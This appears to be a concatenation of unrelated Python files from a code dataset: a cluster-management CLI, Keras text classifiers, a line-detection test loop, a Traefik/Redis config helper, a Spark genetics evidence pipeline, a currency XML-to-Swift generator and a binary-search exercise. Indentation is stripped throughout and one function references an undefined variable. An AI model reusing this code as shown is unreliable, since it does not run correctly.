print(result.to_dict())
@_zk_wrapper
def ha_node_update(self):
node_name = self.args.name
if self.args.maintain is None and not self.args.role:
raise exceptions.ClientError("Too few arguments")
maintain = self.args.maintain
role = self.args.role
result = self.zk.update_node(node_name, maintain, role)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_node_delete(self):
node_name = self.args.name
self.zk.delete_node(node_name)
@_zk_wrapper
def ha_service_list(self):
result = self.zk.list_services(self.args.node, self.args.role,
self.args.status)
if self.args.format == 'pretty':
print(utils.format_output('service', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_service_get(self):
result = self.zk.get_service(self.args.name.lower(), self.args.node)
if self.args.format == 'pretty':
print(utils.format_output('service', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_cluster_switch(self):
try:
self.zk.switch_master_and_slave()
print("Switch success")
except exceptions.OpenLabCmdError:
print("Switch failed")
@_zk_wrapper
def ha_cluster_repair(self):
# TODO(bz) This repair may support other function
if self.args.security_group:
try:
self.zk.check_and_repair_deployment_sg(
is_dry_run=self.args.dry_run)
print("Check success")
except exceptions.OpenLabCmdError:
print("Check failed")
@_zk_wrapper
def ha_config_list(self):
result = self.zk.list_configuration()
if self.args.format == 'pretty':
print(utils.format_dict(result))
else:
print(result)
@_zk_wrapper
def ha_config_update(self):
value = self.args.value
if self.args.name in ['allow_switch']:
value = self._str2bool(value)
self.zk.update_configuration(self.args.name, value)
def run(self):
# no arguments, print help messaging, then exit with error(1)
if not self.args.command:
self.parser.print_help()
return 1
if not getattr(self.args, 'func', None):
help_message = subprocess.getoutput("%s -h" % ' '.join(sys.argv))
print(help_message)
return 1
self.args.func()
def _initConfig(self):
self.config = configparser.ConfigParser()
if self.args.config:
locations = [self.args.config]
else:
locations = ['/etc/openlab/openlab.conf',
'~/openlab.conf',
'/usr/local/etc/openlab/openlab.conf']
for fp in locations:
if os.path.exists(os.path.expanduser(fp)):
self.config.read(os.path.expanduser(fp))
return
raise exceptions.ClientError("Unable to locate config file in "
"%s" % locations)
def _main(self):
try:
self.parser = self.create_parser()
self.args = self.parser.parse_args()
self._initConfig()
return self.run()
except exceptions.OpenLabCmdError as e:
print(e)
return 1
@classmethod
def main(cls):
return cls()._main()
def main():
return OpenLabCmd.main()
if __name__ == '__main__':
sys.exit(main())
|
from __future__ import print_function
import numpy as np
import keras
from keras.preprocessing import sequence
import keras.preprocessing.text
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Embedding
from keras.layers import GlobalAveragePooling1D
from keras.datasets import imdb
import tempfile
def make_keras_picklable():
def __getstate__(self):
model_str = ""
with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:
keras.models.save_model(self, fd.name, overwrite=True)
model_str = fd.read()
d = { 'model_str': model_str }
return d
def __setstate__(self, state):
with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:
fd.write(state['model_str'])
fd.flush()
model = keras.models.load_model(fd.name)
self.__dict__ = model.__dict__
cls = keras.models.Model
cls.__getstate__ = __getstate__
cls.__setstate__ = __setstate__
make_keras_picklable()
def create_ngram_set(input_list, ngram_value=2):
"""
Extract a set of n-grams from a list of integers.
>>> create_ngram_set([1, 4, 9, 4, 1, 4], ngram_value=2)
{(4, 9), (4, 1), (1, 4), (9, 4)}
>>> create_ngram_set([1, 4, 9, 4, 1, 4], ngram_value=3)
[(1, 4, 9), (4, 9, 4), (9, 4, 1), (4, 1, 4)]
"""
return set(zip(*[input_list[i:] for i in range(ngram_value)]))
def add_ngram(sequences, token_indice, ngram_range=2):
"""
Augment the input list of list (sequences) by appending n-grams values.
Example: adding bi-gram
>>> sequences = [[1, 3, 4, 5], [1, 3, 7, 9, 2]]
>>> token_indice = {(1, 3): 1337, (9, 2): 42, (4, 5): 2017}
>>> add_ngram(sequences, token_indice, ngram_range=2)
[[1, 3, 4, 5, 1337, 2017], [1, 3, 7, 9, 2, 1337, 42]]
Example: adding tri-gram
>>> sequences = [[1, 3, 4, 5], [1, 3, 7, 9, 2]]
>>> token_indice = {(1, 3): 1337, (9, 2): 42, (4, 5): 2017, (7, 9, 2): 2018}
>>> add_ngram(sequences, token_indice, ngram_range=3)
[[1, 3, 4, 5, 1337], [1, 3, 7, 9, 2, 1337, 2018]]
"""
new_sequences = []
for input_list in sequences:
new_list = input_list[:]
for i in range(len(new_list) - ngram_range + 1):
for ngram_value in range(2, ngram_range + 1):
ngram = tuple(new_list[i:i + ngram_value])
if ngram in token_indice:
new_list.append(token_indice[ngram])
new_sequences.append(new_list)
return new_sequences
class FastTextClassifier:
def __init__(self):
pass
def predict(self, X):
x_test = self.tokenizer.texts_to_sequences(X)
x_test = self.add_ngrams(x_test)
x_test = sequence.pad_sequences(x_test, maxlen=self.maxlen)
return self.model.predict_classes(x_test, verbose=0).flatten()
def predict_proba(self, X):
x_test = self.tokenizer.texts_to_sequences(X)
x_test = self.add_ngrams(x_test)
x_test = sequence.pad_sequences(x_test, maxlen=self.maxlen)
a = self.model.predict(x_test).flatten()
a = a.reshape(-1, 1)
return np.hstack((1 - a, a))
def fit(self, X, Y, ngram_range=1, max_features=20000, maxlen=400,
batch_size=32, embedding_dims=50, epochs=5):
self.tokenizer = keras.preprocessing.text.Tokenizer(
num_words=max_features, split=" ", char_level=False)
self.tokenizer.fit_on_texts(X)
x_train = self.tokenizer.texts_to_sequences(X)
self.ngram_range = ngram_range
self.maxlen = maxlen
self.add_ngrams = lambda x: x
if ngram_range > 1:
ngram_set = set()
for input_list in x_train:
for i in range(2, ngram_range + 1):
set_of_ngram = create_ngram_set(input_list, ngram_value=i)
ngram_set.update(set_of_ngram)
# Dictionary mapping n-gram token to a unique integer.
# Integer values are greater than max_features in order
# to avoid collision with existing features.
start_index = max_features + 1
self.token_indice = {v: k + start_index for k, v in enumerate(ngram_set)}
indice_token = {self.token_indice[k]: k for k in self.token_indice}
# max_features is the highest integer that could be found in the dataset.
max_features = np.max(list(indice_token.keys())) + 1
self.add_ngrams = lambda x: add_ngram(x, self.token_indice,
self.ngram_range)
x_train = self.add_ngrams(x_train)
print('Average train sequence length: {}'.format(np.mean(list(map(len, x_train)), dtype=int)))
x_train = sequence.pad_sequences(x_train, maxlen=self.maxlen)
self.model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
self.model.add(Embedding(max_features,
embedding_dims,
input_length=self.maxlen))
# we add a GlobalAveragePooling1D, which will average the embeddings
# of all words in the document
self.model.add(GlobalAveragePooling1D())
# We project onto a single unit output layer, and squash via sigmoid:
self.model.add(Dense(1, activation='sigmoid'))
self.model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
self.model.fit(x_train, Y, batch_size=batch_size, epochs=epochs, verbose=2)
def get_most_common_embeddings(tokenizer, nlp):
import operator
most_common = list(map(operator.itemgetter(0), sorted(tokenizer.word_index.items(), key=operator.itemgetter(1))))
n = len(tokenizer.word_index)
if tokenizer.num_words is not None:
most_common = most_common[:tokenizer.num_words]
n = min(tokenizer.num_words, n)
embeddings = np.zeros((n + 1, nlp.vocab[0].vector.shape[0]), dtype='float32')
tokenized = nlp.tokenizer.pipe([x for x in most_common])
for i, lex in enumerate(tokenized):
if lex.has_vector:
embeddings[i + 1] = lex.vector
return embeddings
class CNNClassifier:
def __init__(self, nlp):
self.nlp = nlp
pass
def predict(self, X):
return self.predict_proba(X).argmax(axis=1)
def predict_proba(self, X):
x_test = self.tokenizer.texts_to_sequences(X)
x_test = sequence.pad_sequences(x_test, maxlen=self.maxlen)
a = self.model.predict(x_test, verbose=0).flatten()
a = a.reshape(-1, 1)
return np.hstack((1 - a, a))
def fit(self, X, Y, max_features=20000, maxlen=400,
batch_size=32, hidden_dims=250, filters=250, kernel_size=3,
epochs=5):
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
self.tokenizer = keras.preprocessing.text.Tokenizer(
num_words=max_features, split=" ", char_level=False)
self.tokenizer.fit_on_texts(X)
x_train = self.tokenizer.texts_to_sequences(X)
self.maxlen = maxlen
embeddings = get_most_common_embeddings(self.tokenizer, self.nlp)
x_train = sequence.pad_sequences(x_train, maxlen=self.maxlen)
self.model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
self.model.add(
Embedding(
embeddings.shape[0],
embeddings.shape[1],
input_length=maxlen,
trainable=False,
weights=[embeddings]
)
)
self.model.add(Dropout(0.2))
# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
self.model.add(Conv1D(filters, kernel_size, padding='valid',
activation='relu', strides=1))
# we use max pooling:
self.model.add(GlobalMaxPooling1D())
# We add a vanilla hidden layer:
self.model.add(Dense(hidden_dims))
self.model.add(Dropout(0.2))
self.model.add(Activation('relu'))
# We project onto a single unit output layer, and squash it with a sigmoid:
self.model.add(Dense(1))
# model.add(Dense(3))
self.model.add(Activation('sigmoid'))
# optimizer = keras.optimizers.Adam(lr=0.001)
optimizer = keras.optimizers.Adam(lr=0.0001)
# model.compile(loss='categorical_crossentropy',
# optimizer=optimizer,
# metrics=['accuracy'])
self.model.compile(loss='binary_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
self.model.fit(x_train, Y, batch_size=batch_size, epochs=epochs, verbose=2)
|
import numpy as np
from evaluation.eval_process import *
from libs.utils import *
class Test_Process_DRM(object):
def __init__(self, cfg, dict_DB):
self.cfg = cfg
self.dataloader = dict_DB['testloader']
self.DNet = dict_DB['DNet']
self.RNet = dict_DB['RNet']
self.MNet = dict_DB['MNet']
self.forward_model = dict_DB['forward_model']
self.post_process = dict_DB['CRM_process']
self.eval_func = dict_DB['eval_func']
self.batch_size = self.cfg.batch_size['test_line']
self.size = to_tensor(np.float32(cfg.size))
self.candidates = load_pickle(self.cfg.pickle_dir + 'detector/detector_test_candidates')
self.candidates = to_tensor(self.candidates).unsqueeze(0)
self.cand_num = self.candidates.shape[1]
self.step = create_forward_step(self.candidates.shape[1],
cfg.batch_size['test_line'])
self.visualize = dict_DB['visualize']
def run(self, DNet, RNet, MNet, mode='test'):
result = {'out': {'pri': [], 'mul': []},
'gt': {'pri': [], 'mul': []}}
with torch.no_grad():
DNet.eval()
RNet.eval()
MNet.eval()
self.post_process.update_model(DNet, RNet, MNet)
for i, self.batch in enumerate(self.dataloader): # load batch data
self.img_name = self.batch['img_name'][0]
self.img = self.batch['img'].cuda()
pri_gt = self.batch['pri_gt'][0][:, :4]
mul_gt = self.batch['mul_gt'][0][:, :4]
# semantic line detection
out = self.forward_model.run_detector(img=self.img,
line_pts=self.candidates,
step=self.step,
model=DNet)
# reg result
out['pts'] = self.candidates[0] + out['reg'] * self.size
# cls result
pos_check = torch.argmax(out['cls'], dim=1)
out['pos'] = out['pts'][pos_check == 1]
# primary line
sorted = torch.argsort(out['cls'][:, 1], descending=True)
out['pri'] = out['pts'][sorted[0], :].unsqueeze(0)
if torch.sum(pos_check == 1) == 0:
out['pos'] = out['pri']
# post process
self.post_process.update_data(self.batch, self.img, out['pos'])
out['pri'], out['mul'] = self.post_process.run()
# visualize
self.visualize.display_for_test(batch=self.batch, out=out)
# record output data
result['out']['pri'].append(out['pri'])
result['out']['mul'].append(out['mul'])
result['gt']['pri'].append(pri_gt)
result['gt']['mul'].append(mul_gt)
print('image %d ---> %s done!' % (i, self.img_name))
# save pickle
save_pickle(dir_name=self.cfg.output_dir + 'test/pickle/',
file_name='result',
data=result)
return self.evaluation()
def evaluation(self):
# evaluation
data = load_pickle(self.cfg.output_dir + 'test/pickle/result')
auc_a = eval_AUC_A(out=data['out']['pri'],
gt=data['gt']['pri'],
eval_func=self.eval_func)
auc_p, auc_r = eval_AUC_PR(out=data['out']['mul'],
gt=data['gt']['mul'],
eval_func=self.eval_func)
return auc_a, auc_p, auc_r |
import os
import redis
_tls_store_certfile_key = "traefik/tls/stores/default/defaultCertificate/certFile"
_tls_store_certfile_value = "{cert_file}"
_tls_store_keyfile_key = "traefik/tls/stores/default/defaultCertificate/keyFile"
_tls_store_keyfile_value = "{key_file}"
_service_key = "traefik/tcp/services/{name}/loadBalancer/servers/0/address"
_service_value = "{host}:{port}"
_router_rule_key = "traefik/tcp/routers/{name}/rule"
_router_rule_value = "{rule}"
_router_service_key = "traefik/tcp/routers/{name}/service"
_router_service_value = "{service_name}"
_router_tls_key = "traefik/tcp/routers/{name}/tls"
_router_tls_value = "true"
def set_default_certificate(
key_file: str = "/etc/certs/tls.key", cert_file: str = "/etc/certs/tls.crt"
):
r = redis_conn()
check_key_file = r.get(_tls_store_keyfile_key)
check_cert_file = r.get(_tls_store_certfile_key)
if check_key_file is None or check_cert_file is None:
ok = r.set(
_tls_store_keyfile_key,
_tls_store_keyfile_value.format(key_file=key_file),
)
if not ok:
raise Exception("cannot set tls default key file")
ok = r.set(
_tls_store_certfile_key,
_tls_store_certfile_value.format(cert_file=cert_file),
)
if not ok:
raise Exception("cannot set tls default cert file")
r.close()
def redis_conn(
hostname: str = "localhost", port: int = 6379, password: str = ""
) -> "redis.Redis":
"""Establish a redis connection
This function checks the following environment variable to establish
the connection:
- REDIS_HOSTNAME
- REDIS_PORT
- REDIS_PASSWORD
:return: the redis connection
:rtype: redis.Redis
"""
env_hostname = os.getenv("REDIS_HOSTNAME")
if env_hostname:
hostname = env_hostname
env_port = os.getenv("REDIS_PORT")
if env_port:
port = int(env_port)
env_password = os.getenv("REDIS_PASSWORD")
if env_password:
password = env_password
r = redis.Redis(host=hostname, port=port, password=password)
return r
def set_services(
name: str = "myservice", host: str = "127.0.0.1", port: int = -1
) -> bool:
"""Set traefic store kv of a service.
Ref: https://doc.traefik.io/traefik/routing/providers/kv/#services
:param name: name of the service to insert, defaults to "myservice"
:type name: str, optional
:param host: host that will listen, defaults to "127.0.0.1"
:type host: str, optional
:param port: port of the service that listen, defaults to -1
:type port: int, optional
:raises Exception: Not a valid port integer
:return: True if the operation went well
:rtype: bool
"""
if port <= 0:
raise Exception("not a valid port integer")
r = redis_conn()
res = r.set(
_service_key.format(name=name), _service_value.format(host=host, port=port)
)
r.close()
return res is True
def set_routers(
name: str = "myrouter",
service_name: str = "myservice",
rule: str = "Host(`example.com`)",
) -> bool:
"""Set traefic store kv of a router
:param name: name of the router to insert, defaults to "myrouter"
:type name: str, optional
:param service_name: name of the associated service, defaults to "myservice"
:type service_name: str, optional
:param rule: rule to store, defaults to "Host(`example.com`)"
:type rule: str, optional
:raises Exception: empty rule
:return: True if the operation went well
:rtype: bool
"""
if not (len(rule) > 0):
raise Exception("rule is an empty string")
r = redis_conn()
res_rule = r.set(
_router_rule_key.format(name=name), _router_rule_value.format(rule=rule)
)
res_service = r.set(
_router_service_key.format(name=name),
_router_service_value.format(service_name=service_name),
)
res_tls = r.set(_router_tls_key.format(name=name), _router_tls_value)
r.close()
return all([res_rule, res_service, res_tls])
def delete_route_info(router_name: str, service_name: str) -> bool:
"""Delete kv of a stored route
:param router_name: name of the router
:type router_name: str
:param service_name: name of the service associated
:type service_name: str
:return: True if the operation went well
:rtype: bool
"""
r = redis_conn()
res = r.delete(_service_key.format(name=service_name))
res_rule = r.delete(_router_rule_key.format(name=router_name))
res_service = r.delete(_router_service_key.format(name=router_name))
res_tls = r.delete(_router_tls_key.format(name=router_name))
r.close()
return all([res, res_rule, res_service, res_tls])
if __name__ == "__main__":
# smoke test redis module
print(set_services(name="service-1", port=8777))
print(
set_routers(
name="Router-1",
service_name="service-1",
rule="HostSNI(`username.192.168.0.1.myip.cloud.blabla.it`)",
)
)
print(delete_route_info(router_name="Router-1", service_name="service-1"))
set_default_certificate()
|
#!/usr/bin/env python
import argparse
import sys
import pyspark.sql
from pyspark.sql.types import DoubleType, StringType, IntegerType
from pyspark.sql.functions import col, lit, udf, when, expr, explode, substring, array, regexp_extract, concat_ws
import logging
def load_eco_dict(inf):
'''
Loads the csq to eco scores into a dict
Returns: dict
'''
# Load
eco_df = (
spark.read.csv(inf, sep='\t', header=True, inferSchema=True)
.select('Term', 'Accession', col('eco_score').cast(DoubleType()))
)
# Convert to python dict
eco_dict = {}
eco_link_dict = {}
for row in eco_df.collect():
eco_dict[row.Term] = row.eco_score
eco_link_dict[row.Term] = row.Accession
return (eco_dict, eco_link_dict)
def main():
# Parsing parameters:
parser = argparse.ArgumentParser(
description='This script pulls together data from Open Targets Genetics portal to generate Platform evidences.'
)
parser.add_argument('--locus2gene', help='Input table containing locus to gene scores.', type=str, required=True)
parser.add_argument('--toploci', help='Table containing top loci for all studies.', type=str, required=True)
parser.add_argument('--study', help='Table with all the studies.', type=str, required=True)
parser.add_argument(
'--variantIndex', help='Table with the variant indices (from gnomad 2.x).', type=str, required=True
)
parser.add_argument('--ecoCodes', help='Table with consequence ECO codes.', type=str, required=True)
parser.add_argument('--outputFile', help='Output gzipped json file.', type=str, required=True)
parser.add_argument('--threshold', help='Threshold applied on l2g score for filtering.', type=float, required=True)
parser.add_argument('--logFile', help='Destination of the logs generated by this script.', type=str, required=False)
args = parser.parse_args()
# extract parameters:
in_l2g = args.locus2gene
in_toploci = args.toploci
in_study = args.study
in_varindex = args.variantIndex
in_csq_eco = args.ecoCodes
l2g_threshold = args.threshold
# Initialize logger based on the provided logfile.
# If no logfile is specified, logs are written to stderr
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
if args.logFile:
logging.config.fileConfig(filename=args.logFile)
else:
logging.StreamHandler(sys.stderr)
# Parse output file:
out_file = args.outputFile
# Initialize spark session
global spark
spark = (pyspark.sql.SparkSession.builder.getOrCreate())
logging.info(f'Spark version: {spark.version}')
# Log parameters:
logging.info(f'Locus2gene table: {in_l2g}')
logging.info(f'Top locus table: {in_toploci}')
logging.info(f'Study table: {in_study}')
logging.info(f'Variant index table: {in_varindex}')
logging.info(f'ECO code table: {in_csq_eco}')
logging.info(f'Output file: {out_file}')
logging.info(f'l2g score threshold: {l2g_threshold}')
logging.info('Generating evidence:')
# Load locus-to-gene (L2G) score data
l2g = (
spark.read.parquet(in_l2g)
# Keep results trained on high or medium confidence gold-standards
.filter(col('training_gs') == 'high_medium')
# Keep results from xgboost model
.filter(col('training_clf') == 'xgboost')
# keepging rows with l2g score above the threshold:
.filter(col('y_proba_full_model') >= l2g_threshold)
# Only keep study, variant, gene and score info
.select(
'study_id',
'chrom', 'pos', 'ref', 'alt',
'gene_id',
'y_proba_full_model',
)
)
# Load association statistics (only pvalue is required) from top loci table
pvals = (
spark.read.parquet(in_toploci)
# # Calculate pvalue from the mantissa and exponent
# .withColumn('pval', col('pval_mantissa') * pow(10, col('pval_exponent')))
# # NB. be careful as very small floats will be set to 0, we can se these
# # to the smallest possible float instead
# .withColumn('pval',
# when(col('pval') == 0, sys.float_info.min)
# .otherwise(col('pval'))
# )
# Keep required fields
.select(
'study_id', 'chrom', 'pos', 'ref', 'alt', 'beta', 'beta_ci_lower', 'beta_ci_upper',
'pval_mantissa', 'pval_exponent', 'odds_ratio', 'oddsr_ci_lower', 'oddsr_ci_upper'
)
)
# Load (a) disease information, (b) sample size from the study table
study_info = (
spark.read.parquet(in_study)
.select(
'study_id', 'pmid', 'pub_date', 'pub_author', 'trait_reported',
'trait_efos',
col('n_initial').alias('sample_size') # Rename to sample size
)
# Warning! Not all studies have an EFO annotated. Also, some have
# multiple EFOs! We need to decide a strategy to deal with these.
# # For example, only keep studies with 1 efo:
# .filter(size(col('trait_efos')) == 1)
# .withColumn('efo', col('trait_efos').getItem(0))
# .drop('trait_efos')
# Or, drop rows with no EFO and then explode array to multiple rows
.withColumn(
'trait_efos',
when(
col('trait_efos').isNotNull(),
expr('filter(trait_efos, t -> length(t) > 0)')
)
)
.withColumn('efo', explode(col('trait_efos')))
.drop('trait_efos')
)
# Get mapping for rsIDs:
rsID_map = (
spark.read.parquet(in_varindex)
# chrom_b38|pos_b38
# Explode consequences, only keeping canonical transcript
.selectExpr(
'chrom_b38 as chrom', 'pos_b38 as pos', 'ref', 'alt', 'rsid'
)
)
# Load consequences:
var_consequences = (
spark.read.parquet(in_varindex)
# chrom_b38|pos_b38
# Explode consequences, only keeping canonical transcript
.selectExpr(
'chrom_b38 as chrom', 'pos_b38 as pos', 'ref', 'alt',
'vep.most_severe_consequence as most_severe_csq',
'''explode(
filter(vep.transcript_consequences, x -> x.canonical == 1)
) as tc
'''
)
# Keep required fields from consequences struct
.selectExpr(
'chrom', 'pos', 'ref', 'alt', 'most_severe_csq',
'tc.gene_id as gene_id',
'tc.consequence_terms as csq_arr',
)
)
# Get most severe consequences:
# Load term to eco score dict
# (eco_dict,eco_link_dict) = spark.sparkContext.broadcast(load_eco_dict(in_csq_eco))
eco_dicts = spark.sparkContext.broadcast(load_eco_dict(in_csq_eco))
get_link = udf(
lambda x: eco_dicts.value[1][x],
StringType()
)
# Extract most sereve csq per gene.
# Create UDF that reverse sorts csq terms using eco score dict, then select
# the first item. Then apply UDF to all rows in the data.
get_most_severe = udf(
lambda arr: sorted(arr, key=lambda x: eco_dicts.value[0].get(x, 0), reverse=True)[0],
StringType()
)
var_consequences = (
var_consequences.withColumn('most_severe_gene_csq', get_most_severe(col('csq_arr')))
.withColumn('consequence_link', get_link(col('most_severe_gene_csq')))
)
# Join datasets together
processed = (
l2g
# Join L2G to pvals, using study and variant info as key
.join(pvals, on=['study_id', 'chrom', 'pos', 'ref', 'alt'])
# Join this to the study info, using study_id as key
.join(study_info, on='study_id', how='left')
# Join transcript consequences:
.join(var_consequences, on=['chrom', 'pos', 'ref', 'alt', 'gene_id'], how='left')
# Join rsIDs:
.join(rsID_map, on=['chrom', 'pos', 'ref', 'alt'], how='left')
# Filling with missing values:
.fillna(
{
'most_severe_gene_csq': 'intergenic_variant',
'consequence_link': 'http://purl.obolibrary.org/obo/SO_0001628'
}
)
)
# Write output
(
processed
.withColumn(
'literature',
when(col('pmid') != '', array(regexp_extract(col('pmid'), r"PMID:(\d+)$", 1))).otherwise(None)
)
.select(
lit('ot_genetics_portal').alias('datasourceId'),
lit('genetic_association').alias('datatypeId'),
col('gene_id').alias('targetFromSourceId'),
col('efo').alias('diseaseFromSourceMappedId'),
col('literature'),
col('pub_author').alias('publicationFirstAuthor'),
substring(col('pub_date'), 1, 4).cast(IntegerType()).alias('publicationYear'),
col('trait_reported').alias('diseaseFromSource'),
col('study_id').alias('studyId'),
col('sample_size').alias('studySampleSize'),
col('pval_mantissa').alias('pValueMantissa'),
col('pval_exponent').alias('pValueExponent'),
col('odds_ratio').alias('oddsRatio'),
col('oddsr_ci_lower').alias('oddsRatioConfidenceIntervalLower'),
col('oddsr_ci_upper').alias('oddsRatioConfidenceIntervalUpper'),
col('beta').alias('beta'),
col('beta_ci_lower').alias('betaConfidenceIntervalLower'),
col('beta_ci_upper').alias('betaConfidenceIntervalUpper'),
col('y_proba_full_model').alias('resourceScore'),
col('rsid').alias('variantRsId'),
concat_ws('_', col('chrom'), col('pos'), col('ref'), col('alt')).alias('variantId'),
regexp_extract(col('consequence_link'), r"\/(SO.+)$", 1).alias('variantFunctionalConsequenceId')
)
.dropDuplicates(['variantId', 'studyId', 'targetFromSourceId', 'diseaseFromSourceMappedId'])
.write.format('json').mode('overwrite').option('compression', 'gzip').save(out_file)
)
return 0
if __name__ == '__main__':
main()
|
from xml.dom.minidom import parse
import json
struct_format = '''
public struct {0}: Currency {{
public static var code = "{0}"
public static var name = "{1}"
public static var numericCode = "{2}"
public static var minorUnits: Int? = {3}
public static var entities: [String] = [{4}]
public var value: Decimal
public init(_ value: Decimal) {{
self.value = value
}}
}}
'''
def parse_xml(filename):
dom = parse(filename)
filename = f'{dom.firstChild.nodeName}_{dom.firstChild.getAttribute("Pblshd")}'
result = dict()
elements = dom.getElementsByTagName('CcyNtry')
for entry in elements:
if not entry.getElementsByTagName("Ccy"):
continue
entity = entry.getElementsByTagName("CtryNm")[0].firstChild.data
name = entry.getElementsByTagName("CcyNm")[0].firstChild.data
code = entry.getElementsByTagName("Ccy")[0].firstChild.data
numeric = entry.getElementsByTagName("CcyNbr")[0].firstChild.data
units = entry.getElementsByTagName("CcyMnrUnts")[0].firstChild.data
try:
units = int(units)
except:
units = None
if code in result:
result[code]['entities'].append(entity)
else:
result[code] = {
'code': code,
'name': name,
'numericCode': numeric,
'minorUnits': units,
'entities': [entity]
}
return result
def write_json(currencies, filename):
with open(f'{filename}.json', 'w') as f:
f.write(json.dumps(array))
def main():
result = parse_xml('list_one.xml')
array = list()
for code in sorted(result.keys()):
array.append(result[code])
write_swift(array)
def write_swift(currencies):
with open(f'Currencies.swift', 'w') as f:
f.write('import Foundation\nimport Money\n')
for currency in currencies:
units = currency['minorUnits'] or 'nil'
entities = [e.replace('"', '\\"') for e in currency['entities']]
entities = ', '.join([f'"{e}"' for e in entities])
struct = struct_format.format(currency['code'], currency['name'], currency['numericCode'], units, entities)
f.write(struct)
if __name__ == '__main__':
main()
|
"""
210CT - Programming, Algorithms and Data Structures.
Question9.py
Purpose: A function to search a value between a given interval
in sequence using binary search algorithm.
Author : Rithin Chalumuri
Version: 1.0
Date : 02/12/16
"""
def rangeBinarySearch( sequence, a, b ):
"""
Function to search a value between a given interval in sequence using binary search algorithm.
Parameters:
sequence(list); the sequence of different values
a(int); the lower limit of the interval
b(int); the upper limit of the interval
Returns:
A boolean value; True if a value is found between the given interval, otherwise false.
Raises:
TypeError: If user provides inputs of an unsupported type.
"""
try:
typeSeq = isinstance(sequence,list)
typeA = isinstance(a,int) or isinstance(a,float)
typeB = isinstance(b,int) or isinstance(b,float)
if not(typeSeq) or not(typeA) or not(typeB): #If wrong types of input are provided
raise TypeError
if b < a: #When the user provides upper limit value lesser than lower limit value
(a,b) = (b,a)
print("The upper limit value is lesser than lower limit value.")
print("Inorder to proceed, This function has swapped the values of upper and lower limits")
#Binary Search Algorithm
start = 0
end = len(sequence)-1
while start <= end:
mid = (start+end)//2 #pivot
if a <= sequence[mid] <= b : #if the middle value of sequence is in the range
return True
elif b < sequence[mid]: #if upper limit is lesser than middle value
end = mid -1
else: # if upper limit is greater than middle value
start = mid +1
return False
except TypeError: #If user provides unsupported types of input
print("Error: Please provide the sequence of type 'list'")
print(" and limits of type 'int' and try again.")
return False
# Testing rangeBinarySearch Function
if __name__ == "__main__":
sequence = [-2.5,-2,-1,0,1,1.32,2,3,5,6,7,16.5,19,29,39,40,43,46,49]
print("Sequence: "+str(sequence))
test1 = (20,40)
test2 = (1,1)
test3 = (1,3)
test4 = (0,1)
test5 = (1,-5)
test6 = (100,200)
test7 = ("a","b")
test8 = (16.4,16.6)
tests = [test1, test2, test3, test4, test5, test6,test7,test8]
testresults = [True,True,True,True,True,False,False,True]
count = 0
passed = 0
failed = 0
for test in tests:
print("Performing Test " + str(count+1) + ";")
print("lower range = "+str(test[0]) + ", upper range = "+ str(test[1]))
result = rangeBinarySearch(sequence, test[0], test[1])
if result == testresults[count]:
print("Function Output = " + str(result))
print("Test Passed.")
passed += 1
else:
print("Function Output = " + str(result))
print("Expected Output = " + str(testresults[count]))
print("Test Failed.")
failed += 1
count = count + 1
print("-"*60)
print("Total tests performed: "+str(count))
print("Tests passed: "+str(passed))
print("Tests failed: "+str(failed))
|
Subsets and Splits